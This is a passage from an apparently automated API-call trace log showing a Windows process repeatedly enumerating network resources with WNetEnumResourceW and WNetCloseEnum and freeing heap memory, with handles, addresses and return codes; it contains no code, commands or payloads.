(hEnum=0x28bf38) returned 0x0 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4200098 | out: hHeap=0x1db0000) returned 1 [0192.539] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x42040a0 | out: hHeap=0x1db0000) returned 1 [0192.541] WNetEnumResourceW (in: hEnum=0x28bee0, lpcCount=0x348e3c4, lpBuffer=0x41ec088, lpBufferSize=0x348e3b4 | out: lpcCount=0x348e3c4, lpBuffer=0x41ec088, lpBufferSize=0x348e3b4) returned 0x103 [0192.541] WNetCloseEnum (hEnum=0x28bee0) returned 0x0 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41ec088 | out: hHeap=0x1db0000) returned 1 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41f0090 | out: hHeap=0x1db0000) returned 1 [0192.541] WNetEnumResourceW (in: hEnum=0x28be88, lpcCount=0x348e404, lpBuffer=0x41d8078, lpBufferSize=0x348e3f4 | out: lpcCount=0x348e404, lpBuffer=0x41d8078, lpBufferSize=0x348e3f4) returned 0x103 [0192.541] WNetCloseEnum (hEnum=0x28be88) returned 0x0 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41d8078 | out: hHeap=0x1db0000) returned 1 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41dc080 | out: hHeap=0x1db0000) returned 1 [0192.541] WNetEnumResourceW (in: hEnum=0x28be30, lpcCount=0x348e444, lpBuffer=0x41c4068, lpBufferSize=0x348e434 | out: lpcCount=0x348e444, lpBuffer=0x41c4068, lpBufferSize=0x348e434) returned 0x103 [0192.541] WNetCloseEnum (hEnum=0x28be30) returned 0x0 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41c4068 | out: hHeap=0x1db0000) returned 1 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41c8070 | out: hHeap=0x1db0000) returned 1 [0192.541] WNetEnumResourceW (in: hEnum=0x28bdd8, lpcCount=0x348e484, lpBuffer=0x41b0058, lpBufferSize=0x348e474 | out: lpcCount=0x348e484, lpBuffer=0x41b0058, lpBufferSize=0x348e474) returned 0x103 [0192.541] WNetCloseEnum (hEnum=0x28bdd8) returned 0x0 [0192.541] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41b0058 | out: hHeap=0x1db0000) returned 1 [0192.542] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41b4060 | out: hHeap=0x1db0000) returned 1 [0192.542] WNetEnumResourceW (in: hEnum=0x28bd80, lpcCount=0x348e4c4, lpBuffer=0x3888370, lpBufferSize=0x348e4b4 | out: lpcCount=0x348e4c4, lpBuffer=0x3888370, lpBufferSize=0x348e4b4) returned 0x103 [0192.542] WNetCloseEnum (hEnum=0x28bd80) returned 0x0 [0192.542] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3888370 | out: hHeap=0x1db0000) returned 1 [0192.542] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x41a0050 | out: hHeap=0x1db0000) returned 1 [0192.543] WNetEnumResourceW (in: hEnum=0x28bd28, lpcCount=0x348e504, lpBuffer=0x3884368, lpBufferSize=0x348e4f4 | out: lpcCount=0x348e504, lpBuffer=0x3884368, lpBufferSize=0x348e4f4) returned 0x103 [0192.543] WNetCloseEnum (hEnum=0x28bd28) returned 0x0 [0192.543] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3884368 | out: hHeap=0x1db0000) returned 1 [0192.543] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4190048 | out: hHeap=0x1db0000) returned 1 [0192.544] WNetEnumResourceW (in: hEnum=0x28bcd0, lpcCount=0x348e544, lpBuffer=0x3870358, lpBufferSize=0x348e534 | out: lpcCount=0x348e544, lpBuffer=0x3870358, lpBufferSize=0x348e534) returned 0x103 [0192.544] WNetCloseEnum (hEnum=0x28bcd0) returned 0x0 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3870358 | out: hHeap=0x1db0000) returned 1 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3874360 | out: hHeap=0x1db0000) returned 1 [0192.544] WNetEnumResourceW (in: hEnum=0x28bc78, lpcCount=0x348e584, lpBuffer=0x385c348, lpBufferSize=0x348e574 | out: lpcCount=0x348e584, lpBuffer=0x385c348, lpBufferSize=0x348e574) returned 0x103 [0192.544] WNetCloseEnum (hEnum=0x28bc78) returned 0x0 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x385c348 | out: hHeap=0x1db0000) returned 1 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3860350 | out: hHeap=0x1db0000) returned 1 [0192.544] WNetEnumResourceW (in: hEnum=0x28bc20, lpcCount=0x348e5c4, lpBuffer=0x3848338, lpBufferSize=0x348e5b4 | out: lpcCount=0x348e5c4, lpBuffer=0x3848338, lpBufferSize=0x348e5b4) returned 0x103 [0192.544] WNetCloseEnum (hEnum=0x28bc20) returned 0x0 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3848338 | out: hHeap=0x1db0000) returned 1 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x384c340 | out: hHeap=0x1db0000) returned 1 [0192.544] WNetEnumResourceW (in: hEnum=0x28bbc8, lpcCount=0x348e604, lpBuffer=0x3834328, lpBufferSize=0x348e5f4 | out: lpcCount=0x348e604, lpBuffer=0x3834328, lpBufferSize=0x348e5f4) returned 0x103 [0192.544] WNetCloseEnum (hEnum=0x28bbc8) returned 0x0 [0192.544] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3834328 | out: hHeap=0x1db0000) returned 1 [0192.545] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3838330 | out: hHeap=0x1db0000) returned 1 [0192.545] WNetEnumResourceW (in: hEnum=0x28bb70, lpcCount=0x348e644, lpBuffer=0x3820318, lpBufferSize=0x348e634 | out: lpcCount=0x348e644, lpBuffer=0x3820318, lpBufferSize=0x348e634) returned 0x103 [0192.545] WNetCloseEnum (hEnum=0x28bb70) returned 0x0 [0192.545] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3820318 | out: hHeap=0x1db0000) returned 1 [0192.545] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3824320 | out: hHeap=0x1db0000) returned 1 [0192.545] WNetEnumResourceW (in: hEnum=0x28bb18, lpcCount=0x348e684, lpBuffer=0x380c308, lpBufferSize=0x348e674 | out: lpcCount=0x348e684, lpBuffer=0x380c308, lpBufferSize=0x348e674) returned 0x103 [0192.545] WNetCloseEnum (hEnum=0x28bb18) returned 0x0 [0192.545] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x380c308 | out: hHeap=0x1db0000) returned 1 [0192.545] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3810310 | out: hHeap=0x1db0000) returned 1 [0192.546] WNetEnumResourceW (in: hEnum=0x28bac0, lpcCount=0x348e6c4, lpBuffer=0x37f82f8, lpBufferSize=0x348e6b4 | out: lpcCount=0x348e6c4, lpBuffer=0x37f82f8, lpBufferSize=0x348e6b4) returned 0x103 [0192.546] WNetCloseEnum (hEnum=0x28bac0) returned 0x0 [0192.546] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37f82f8 | out: hHeap=0x1db0000) returned 1 [0192.547] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37fc300 | out: hHeap=0x1db0000) returned 1 [0192.547] WNetEnumResourceW (in: hEnum=0x28ba68, lpcCount=0x348e704, lpBuffer=0x37e42e8, lpBufferSize=0x348e6f4 | out: lpcCount=0x348e704, lpBuffer=0x37e42e8, lpBufferSize=0x348e6f4) returned 0x103 [0192.547] WNetCloseEnum (hEnum=0x28ba68) returned 0x0 [0192.547] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37e42e8 | out: hHeap=0x1db0000) returned 1 [0192.547] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37e82f0 | out: hHeap=0x1db0000) returned 1 [0192.547] WNetEnumResourceW (in: hEnum=0x28ba10, lpcCount=0x348e744, lpBuffer=0x37d02d8, lpBufferSize=0x348e734 | out: lpcCount=0x348e744, lpBuffer=0x37d02d8, lpBufferSize=0x348e734) returned 0x103 [0192.547] WNetCloseEnum (hEnum=0x28ba10) returned 0x0 [0192.547] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37d02d8 | out: hHeap=0x1db0000) returned 1 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37d42e0 | out: hHeap=0x1db0000) returned 1 [0192.548] WNetEnumResourceW (in: hEnum=0x28b9b8, lpcCount=0x348e784, lpBuffer=0x37bc2c8, lpBufferSize=0x348e774 | out: lpcCount=0x348e784, lpBuffer=0x37bc2c8, lpBufferSize=0x348e774) returned 0x103 [0192.548] WNetCloseEnum (hEnum=0x28b9b8) returned 0x0 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37bc2c8 | out: hHeap=0x1db0000) returned 1 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37c02d0 | out: hHeap=0x1db0000) returned 1 [0192.548] WNetEnumResourceW (in: hEnum=0x28b960, lpcCount=0x348e7c4, lpBuffer=0x37a82b8, lpBufferSize=0x348e7b4 | out: lpcCount=0x348e7c4, lpBuffer=0x37a82b8, lpBufferSize=0x348e7b4) returned 0x103 [0192.548] WNetCloseEnum (hEnum=0x28b960) returned 0x0 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37a82b8 | out: hHeap=0x1db0000) returned 1 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37ac2c0 | out: hHeap=0x1db0000) returned 1 [0192.548] WNetEnumResourceW (in: hEnum=0x28b908, lpcCount=0x348e804, lpBuffer=0x37942a8, lpBufferSize=0x348e7f4 | out: lpcCount=0x348e804, lpBuffer=0x37942a8, lpBufferSize=0x348e7f4) returned 0x103 [0192.548] WNetCloseEnum (hEnum=0x28b908) returned 0x0 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37942a8 | out: hHeap=0x1db0000) returned 1 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37982b0 | out: hHeap=0x1db0000) returned 1 [0192.548] WNetEnumResourceW (in: hEnum=0x28b8b0, lpcCount=0x348e844, lpBuffer=0x3780298, lpBufferSize=0x348e834 | out: lpcCount=0x348e844, lpBuffer=0x3780298, lpBufferSize=0x348e834) returned 0x103 [0192.548] WNetCloseEnum (hEnum=0x28b8b0) returned 0x0 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3780298 | out: hHeap=0x1db0000) returned 1 [0192.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x37842a0 | out: hHeap=0x1db0000) returned 1 [0192.549] WNetEnumResourceW (in: hEnum=0x28b858, lpcCount=0x348e884, lpBuffer=0x376c288, lpBufferSize=0x348e874 | out: lpcCount=0x348e884, lpBuffer=0x376c288, lpBufferSize=0x348e874) returned 0x103 [0192.549] WNetCloseEnum (hEnum=0x28b858) returned 0x0 [0192.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x376c288 | out: hHeap=0x1db0000) returned 1 [0192.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3770290 | out: hHeap=0x1db0000) returned 1 [0192.549] WNetEnumResourceW (in: hEnum=0x28b800, lpcCount=0x348e8c4, lpBuffer=0x3758278, lpBufferSize=0x348e8b4 | out: lpcCount=0x348e8c4, lpBuffer=0x3758278, lpBufferSize=0x348e8b4) returned 0x103 [0192.549] WNetCloseEnum (hEnum=0x28b800) returned 0x0 [0192.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3758278 | out: hHeap=0x1db0000) returned 1 [0192.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x375c280 | out: hHeap=0x1db0000) returned 1 [0192.549] WNetEnumResourceW (in: hEnum=0x28eaa0, lpcCount=0x348e904, lpBuffer=0x3744268, lpBufferSize=0x348e8f4 | out: lpcCount=0x348e904, lpBuffer=0x3744268, lpBufferSize=0x348e8f4) returned 0x103 [0192.550] WNetCloseEnum (hEnum=0x28eaa0) returned 0x0 [0192.550] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3744268 | out: hHeap=0x1db0000) returned 1 [0192.550] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3748270 | out: hHeap=0x1db0000) returned 1 [0192.550] WNetEnumResourceW (in: hEnum=0x28ea48, lpcCount=0x348e944, lpBuffer=0x3730258, lpBufferSize=0x348e934 | out: lpcCount=0x348e944, lpBuffer=0x3730258, lpBufferSize=0x348e934) returned 0x103 [0192.550] WNetCloseEnum (hEnum=0x28ea48) returned 0x0 [0192.550] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3730258 | out: hHeap=0x1db0000) returned 1 [0192.550] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3734260 | out: hHeap=0x1db0000) returned 1 [0192.551] WNetEnumResourceW (in: hEnum=0x28e9f0, lpcCount=0x348e984, lpBuffer=0x371c248, lpBufferSize=0x348e974 | out: lpcCount=0x348e984, lpBuffer=0x371c248, lpBufferSize=0x348e974) returned 0x103 [0192.551] WNetCloseEnum (hEnum=0x28e9f0) returned 0x0 [0192.551] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x371c248 | out: hHeap=0x1db0000) returned 1 [0192.551] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3720250 | out: hHeap=0x1db0000) returned 1 [0192.551] WNetEnumResourceW (in: hEnum=0x28e998, lpcCount=0x348e9c4, lpBuffer=0x3708238, lpBufferSize=0x348e9b4 | out: lpcCount=0x348e9c4, lpBuffer=0x3708238, lpBufferSize=0x348e9b4) returned 0x103 [0192.551] WNetCloseEnum (hEnum=0x28e998) returned 0x0 [0192.551] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3708238 | out: hHeap=0x1db0000) returned 1 [0192.551] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x370c240 | out: hHeap=0x1db0000) returned 1 [0192.551] WNetEnumResourceW (in: hEnum=0x28e940, lpcCount=0x348ea04, lpBuffer=0x36f4228, lpBufferSize=0x348e9f4 | out: lpcCount=0x348ea04, lpBuffer=0x36f4228, lpBufferSize=0x348e9f4) returned 0x103 [0192.551] WNetCloseEnum (hEnum=0x28e940) returned 0x0 [0192.552] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36f4228 | out: hHeap=0x1db0000) returned 1 [0192.552] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36f8230 | out: hHeap=0x1db0000) returned 1 [0192.553] WNetEnumResourceW (in: hEnum=0x28e8e8, lpcCount=0x348ea44, lpBuffer=0x36e0218, lpBufferSize=0x348ea34 | out: lpcCount=0x348ea44, lpBuffer=0x36e0218, lpBufferSize=0x348ea34) returned 0x103 [0192.553] WNetCloseEnum (hEnum=0x28e8e8) returned 0x0 [0192.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36e0218 | out: hHeap=0x1db0000) returned 1 [0192.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36e4220 | out: hHeap=0x1db0000) returned 1 [0192.553] WNetEnumResourceW (in: hEnum=0x28e890, lpcCount=0x348ea84, lpBuffer=0x36cc208, lpBufferSize=0x348ea74 | out: lpcCount=0x348ea84, lpBuffer=0x36cc208, lpBufferSize=0x348ea74) returned 0x103 [0192.553] WNetCloseEnum (hEnum=0x28e890) returned 0x0 [0192.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36cc208 | out: hHeap=0x1db0000) returned 1 [0192.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36d0210 | out: hHeap=0x1db0000) returned 1 [0192.553] WNetEnumResourceW (in: hEnum=0x28e838, lpcCount=0x348eac4, lpBuffer=0x36b81f8, lpBufferSize=0x348eab4 | out: lpcCount=0x348eac4, lpBuffer=0x36b81f8, lpBufferSize=0x348eab4) returned 0x103 [0192.553] WNetCloseEnum (hEnum=0x28e838) returned 0x0 [0192.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36b81f8 | out: hHeap=0x1db0000) returned 1 [0192.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36bc200 | out: hHeap=0x1db0000) returned 1 [0192.554] WNetEnumResourceW (in: hEnum=0x28e7e0, lpcCount=0x348eb04, lpBuffer=0x36a41e8, lpBufferSize=0x348eaf4 | out: lpcCount=0x348eb04, lpBuffer=0x36a41e8, lpBufferSize=0x348eaf4) returned 0x103 [0192.554] WNetCloseEnum (hEnum=0x28e7e0) returned 0x0 [0192.554] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36a41e8 | out: hHeap=0x1db0000) returned 1 [0192.554] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36a81f0 | out: hHeap=0x1db0000) returned 1 [0192.554] WNetEnumResourceW (in: hEnum=0x28e788, lpcCount=0x348eb44, lpBuffer=0x36901d8, lpBufferSize=0x348eb34 | out: lpcCount=0x348eb44, lpBuffer=0x36901d8, lpBufferSize=0x348eb34) returned 0x103 [0192.554] WNetCloseEnum (hEnum=0x28e788) returned 0x0 [0192.554] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36901d8 | out: hHeap=0x1db0000) returned 1 [0192.554] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36941e0 | out: hHeap=0x1db0000) returned 1 [0192.554] WNetEnumResourceW (in: hEnum=0x28e730, lpcCount=0x348eb84, lpBuffer=0x367c1c8, lpBufferSize=0x348eb74 | out: lpcCount=0x348eb84, lpBuffer=0x367c1c8, lpBufferSize=0x348eb74) returned 0x103 [0192.555] WNetCloseEnum (hEnum=0x28e730) returned 0x0 [0192.555] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x367c1c8 | out: hHeap=0x1db0000) returned 1 [0192.555] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36801d0 | out: hHeap=0x1db0000) returned 1 [0192.555] WNetEnumResourceW (in: hEnum=0x28e6d8, lpcCount=0x348ebc4, lpBuffer=0x36681b8, lpBufferSize=0x348ebb4 | out: lpcCount=0x348ebc4, lpBuffer=0x36681b8, lpBufferSize=0x348ebb4) returned 0x103 [0192.555] WNetCloseEnum (hEnum=0x28e6d8) returned 0x0 [0192.555] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36681b8 | out: hHeap=0x1db0000) returned 1 [0192.555] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x366c1c0 | out: hHeap=0x1db0000) returned 1 [0192.556] WNetEnumResourceW (in: hEnum=0x28e680, lpcCount=0x348ec04, lpBuffer=0x36541a8, lpBufferSize=0x348ebf4 | out: lpcCount=0x348ec04, lpBuffer=0x36541a8, lpBufferSize=0x348ebf4) returned 0x103 [0192.556] WNetCloseEnum (hEnum=0x28e680) returned 0x0 [0192.556] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36541a8 | out: hHeap=0x1db0000) returned 1 [0192.556] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36581b0 | out: hHeap=0x1db0000) returned 1 [0192.556] WNetEnumResourceW (in: hEnum=0x28e628, lpcCount=0x348ec44, lpBuffer=0x3640198, lpBufferSize=0x348ec34 | out: lpcCount=0x348ec44, lpBuffer=0x3640198, lpBufferSize=0x348ec34) returned 0x103 [0192.556] WNetCloseEnum (hEnum=0x28e628) returned 0x0 [0192.556] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3640198 | out: hHeap=0x1db0000) returned 1 [0192.556] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x36441a0 | out: hHeap=0x1db0000) returned 1 [0192.562] WNetEnumResourceW (in: hEnum=0x28e5d0, lpcCount=0x348ec84, lpBuffer=0x362c188, lpBufferSize=0x348ec74 | out: lpcCount=0x348ec84, lpBuffer=0x362c188, lpBufferSize=0x348ec74) returned 0x103 [0192.562] WNetCloseEnum (hEnum=0x28e5d0) returned 0x0 [0192.562] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x362c188 | out: hHeap=0x1db0000) returned 1 [0192.562] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3630190 | out: hHeap=0x1db0000) returned 1 [0192.562] WNetEnumResourceW (in: hEnum=0x28e578, lpcCount=0x348ecc4, lpBuffer=0x3618178, lpBufferSize=0x348ecb4 | out: lpcCount=0x348ecc4, lpBuffer=0x3618178, lpBufferSize=0x348ecb4) returned 0x103 [0192.562] WNetCloseEnum (hEnum=0x28e578) returned 0x0 [0192.562] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3618178 | out: hHeap=0x1db0000) returned 1 [0192.562] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x361c180 | out: hHeap=0x1db0000) returned 1 [0192.562] WNetEnumResourceW (in: hEnum=0x28e520, lpcCount=0x348ed04, lpBuffer=0x3604168, lpBufferSize=0x348ecf4 | out: lpcCount=0x348ed04, lpBuffer=0x3604168, lpBufferSize=0x348ecf4) returned 0x103 [0192.562] WNetCloseEnum (hEnum=0x28e520) returned 0x0 [0192.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3604168 | out: hHeap=0x1db0000) returned 1 [0192.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3608170 | out: hHeap=0x1db0000) returned 1 [0192.563] WNetEnumResourceW (in: hEnum=0x28e4c8, lpcCount=0x348ed44, lpBuffer=0x35f0158, lpBufferSize=0x348ed34 | out: lpcCount=0x348ed44, lpBuffer=0x35f0158, lpBufferSize=0x348ed34) returned 0x103 [0192.563] WNetCloseEnum (hEnum=0x28e4c8) returned 0x0 [0192.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35f0158 | out: hHeap=0x1db0000) returned 1 [0192.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35f4160 | out: hHeap=0x1db0000) returned 1 [0192.563] WNetEnumResourceW (in: hEnum=0x28e470, lpcCount=0x348ed84, lpBuffer=0x35dc148, lpBufferSize=0x348ed74 | out: lpcCount=0x348ed84, lpBuffer=0x35dc148, lpBufferSize=0x348ed74) returned 0x103 [0192.563] WNetCloseEnum (hEnum=0x28e470) returned 0x0 [0192.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35dc148 | out: hHeap=0x1db0000) returned 1 [0192.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35e0150 | out: hHeap=0x1db0000) returned 1 [0192.633] WNetEnumResourceW (in: hEnum=0x28e418, lpcCount=0x348edc4, lpBuffer=0x35c8138, lpBufferSize=0x348edb4 | out: lpcCount=0x348edc4, lpBuffer=0x35c8138, lpBufferSize=0x348edb4) returned 0x103 [0192.633] WNetCloseEnum (hEnum=0x28e418) returned 0x0 [0192.633] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35c8138 | out: hHeap=0x1db0000) returned 1 [0192.633] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35cc140 | out: hHeap=0x1db0000) returned 1 [0192.633] WNetEnumResourceW (in: hEnum=0x28e3c0, lpcCount=0x348ee04, lpBuffer=0x35b4128, lpBufferSize=0x348edf4 | out: lpcCount=0x348ee04, lpBuffer=0x35b4128, lpBufferSize=0x348edf4) returned 0x103 [0192.633] WNetCloseEnum (hEnum=0x28e3c0) returned 0x0 [0192.633] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35b4128 | out: hHeap=0x1db0000) returned 1 [0192.633] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35b8130 | out: hHeap=0x1db0000) returned 1 [0192.634] WNetEnumResourceW (in: hEnum=0x28e368, lpcCount=0x348ee44, lpBuffer=0x35a0118, lpBufferSize=0x348ee34 | out: lpcCount=0x348ee44, lpBuffer=0x35a0118, lpBufferSize=0x348ee34) returned 0x103 [0192.634] WNetCloseEnum (hEnum=0x28e368) returned 0x0 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35a0118 | out: hHeap=0x1db0000) returned 1 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35a4120 | out: hHeap=0x1db0000) returned 1 [0192.634] WNetEnumResourceW (in: hEnum=0x28e310, lpcCount=0x348ee84, lpBuffer=0x358c108, lpBufferSize=0x348ee74 | out: lpcCount=0x348ee84, lpBuffer=0x358c108, lpBufferSize=0x348ee74) returned 0x103 [0192.634] WNetCloseEnum (hEnum=0x28e310) returned 0x0 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x358c108 | out: hHeap=0x1db0000) returned 1 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3590110 | out: hHeap=0x1db0000) returned 1 [0192.634] WNetEnumResourceW (in: hEnum=0x28e1a0, lpcCount=0x348eec4, lpBuffer=0x35780f8, lpBufferSize=0x348eeb4 | out: lpcCount=0x348eec4, lpBuffer=0x35780f8, lpBufferSize=0x348eeb4) returned 0x103 [0192.634] WNetCloseEnum (hEnum=0x28e1a0) returned 0x0 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35780f8 | out: hHeap=0x1db0000) returned 1 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x357c100 | out: hHeap=0x1db0000) returned 1 [0192.634] WNetEnumResourceW (in: hEnum=0x28e148, lpcCount=0x348ef04, lpBuffer=0x35640e8, lpBufferSize=0x348eef4 | out: lpcCount=0x348ef04, lpBuffer=0x35640e8, lpBufferSize=0x348eef4) returned 0x103 [0192.634] WNetCloseEnum (hEnum=0x28e148) returned 0x0 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35640e8 | out: hHeap=0x1db0000) returned 1 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35680f0 | out: hHeap=0x1db0000) returned 1 [0192.634] WNetEnumResourceW (in: hEnum=0x28e0f0, lpcCount=0x348ef44, lpBuffer=0x35500d8, lpBufferSize=0x348ef34 | out: lpcCount=0x348ef44, lpBuffer=0x35500d8, lpBufferSize=0x348ef34) returned 0x103 [0192.634] WNetCloseEnum (hEnum=0x28e0f0) returned 0x0 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35500d8 | out: hHeap=0x1db0000) returned 1 [0192.634] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35540e0 | out: hHeap=0x1db0000) returned 1 [0192.635] WNetEnumResourceW (in: hEnum=0x28e098, lpcCount=0x348ef84, lpBuffer=0x353c0c8, lpBufferSize=0x348ef74 | out: lpcCount=0x348ef84, lpBuffer=0x353c0c8, lpBufferSize=0x348ef74) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28e098) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x353c0c8 | out: hHeap=0x1db0000) returned 1 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35400d0 | out: hHeap=0x1db0000) returned 1 [0192.636] WNetEnumResourceW (in: hEnum=0x28e040, lpcCount=0x348efc4, lpBuffer=0x35280b8, lpBufferSize=0x348efb4 | out: lpcCount=0x348efc4, lpBuffer=0x35280b8, lpBufferSize=0x348efb4) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28e040) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35280b8 | out: hHeap=0x1db0000) returned 1 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x352c0c0 | out: hHeap=0x1db0000) returned 1 [0192.636] WNetEnumResourceW (in: hEnum=0x28dfe8, lpcCount=0x348f004, lpBuffer=0x35140a8, lpBufferSize=0x348eff4 | out: lpcCount=0x348f004, lpBuffer=0x35140a8, lpBufferSize=0x348eff4) returned 0x103 [0192.636] WNetCloseEnum (hEnum=0x28dfe8) returned 0x0 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35140a8 | out: hHeap=0x1db0000) returned 1 [0192.636] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x35180b0 | out: hHeap=0x1db0000) returned 1 [0192.636] WNetEnumResourceW (in: hEnum=0x28df90, lpcCount=0x348f044, lpBuffer=0x3500098, lpBufferSize=0x348f034 | out: lpcCount=0x348f044, lpBuffer=0x3500098, 